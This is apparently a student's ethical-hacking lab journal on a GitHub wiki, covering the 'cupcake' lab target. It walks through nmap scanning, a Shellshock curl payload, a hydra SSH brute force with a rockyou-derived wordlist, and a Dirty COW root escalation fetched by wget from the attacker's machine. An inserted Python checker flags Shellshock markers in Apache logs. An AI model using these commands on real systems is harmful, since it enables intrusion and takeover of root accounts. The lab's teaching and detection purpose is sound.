Activity 4.1 Cupcake Hacking, Root Escalation - JimKnee-Champ/Ethical-Hacking-Journal GitHub Wiki
How you determined the versions of the two services exposed by cupcake:
Running sudo nmap -sV revealed that ports 22 and 80 were open, running OpenSSH and Apache httpd respectively, and it reported the versions of both services. Visiting the IP address in a browser and checking Chrome's Network tab in the developer tools also revealed OpenSSH version 5.3 (protocol 2) along with Apache httpd version 2.2.15.
How you dealt with parsing nmap result with nmaptocsv:
Run nmap with the "-oG" option to write the results to a grepable file. Then run "nmaptocsv -i (file) -d ","" to produce a CSV listing of the information in that file; the comma given after -d is the delimiter that separates the output into columns. Paste the result into a Google Sheet, then click the clipboard icon that appears after the paste to split the text into columns.
The techniques you used to invoke remote code execution:
The searchsploit utility was used to list exploits for different versions of Linux and its services, and cgi-bin was chosen as the exploit target.
"curl -H 'User-Agent: () { :; }; echo ; echo ; /bin/cat /etc/redhat-release' bash -s :'' http://10.0.5.23/cgi-bin/status"
"sudo nmap -sV -p 80 --script http-shellshock --script-args uri=/cgi-bin/status,cmd="echo ; echo ; /usr/bin/whoami" 10.0.5.23"
The curl command was used to execute commands on the remote server; everything after the echoes specifies the command to run. Invoking /bin/cat by its full path does the same job as the cat command. Other commands are available in the /bin, /sbin, and /usr/sbin directories.
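A defender-side complement to the two probes above, added here as an example that is not part of the original journal: a small Python checker that parses Apache combined-format access log lines (constructed sample lines, not real captures) and flags requests carrying the Shellshock function-definition marker "() {" in the request line, Referer or User-Agent, which is how the curl and nmap requests shown above would appear in the web server's log.

```python
import re

# Apache "combined" log format: ip ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# A Shellshock payload begins with a bash function definition smuggled through an
# environment-exported header: "() {" with optional whitespace before the brace.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{')

# Constructed sample log lines (not from the original page): the first and last carry
# the marker in the User-Agent and Referer headers respectively; the others are benign.
SAMPLE_LOG = """\
10.0.99.103 - - [01/Jan/2024:10:00:01 +0000] "GET /cgi-bin/status HTTP/1.1" 200 62 "-" "() { :; }; echo ; echo ; /bin/cat /etc/redhat-release"
192.168.1.20 - - [01/Jan/2024:10:00:05 +0000] "GET /index.html HTTP/1.1" 200 1432 "-" "Mozilla/5.0 (X11; Linux x86_64)"
192.168.1.21 - - [01/Jan/2024:10:00:09 +0000] "GET /cgi-bin/status HTTP/1.1" 200 61 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine)"
10.0.99.103 - - [01/Jan/2024:10:00:12 +0000] "GET /cgi-bin/status HTTP/1.1" 200 40 "() { :; }; /usr/bin/whoami" "curl/7.68.0"
"""

def parse_line(line: str) -> dict:
    """Split one combined-format line into named fields, or raise ValueError."""
    m = LOG_RE.match(line)
    if not m:
        raise ValueError(f"unparseable log line: {line!r}")
    return m.groupdict()

def find_shellshock(log_text: str) -> list:
    """Return one finding per request whose request line, Referer or User-Agent
    contains the Shellshock marker. Lines that do not parse are skipped."""
    findings = []
    for line in log_text.splitlines():
        try:
            rec = parse_line(line)
        except ValueError:
            continue
        for field in ("request", "referer", "agent"):
            if SHELLSHOCK_RE.search(rec[field]):
                parts = rec["request"].split(" ")
                path = parts[1] if len(parts) > 1 else rec["request"]
                findings.append({"ip": rec["ip"], "path": path,
                                 "field": field, "payload": rec[field]})
                break  # one finding per request is enough
    return findings

if __name__ == "__main__":
    for f in find_shellshock(SAMPLE_LOG):
        print(f"{f['ip']} -> {f['path']} via {f['field']}: {f['payload']}")
```

The same check applied to a real access log would also surface requests that a web application firewall or IDS missed, since it keys on the marker rather than on a specific command.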
The generation of a list of passwords and subsequent ssh brute force:
"zcat /usr/share/wordlists/rockyou.txt.gz | grep -i samwise"
This command pulled every rockyou entry containing "samwise" (case-insensitive) as a list of potential passwords for the samwise account.
"hydra -l samwise -P samwise.txt 10.0.5.23 -t 4 ssh"
Using this command, we brute forced the login and found that the password was "samwisethebrave".
Transfer of files using Python and wget, compiling and running a privilege escalation exploit (it can be different from the demo!)
Root escalation method:
1: PC: searchsploit -m 40839.c - copies the specified exploit source to the machine.
2: PC: python3 -m http.server 8086 - has the machine act as an HTTP server on the specified port, serving the current directory to HTTP requests.
3: Remote Machine (RM): wget http://10.0.99.103:8086/40839.c - downloads the specified file from the listed server (our PC).
4: RM: gcc 40839.c -o cow -lpthread -lcrypt - compiles the code; -lpthread and -lcrypt link the pthread and crypt libraries the exploit needs.
5: RM: ./cow - runs the compiled code, creating a new root user "firefart" with a password of your choosing.
6: You can now log into the new root user with the password you specified. Use "id" to see the privileges.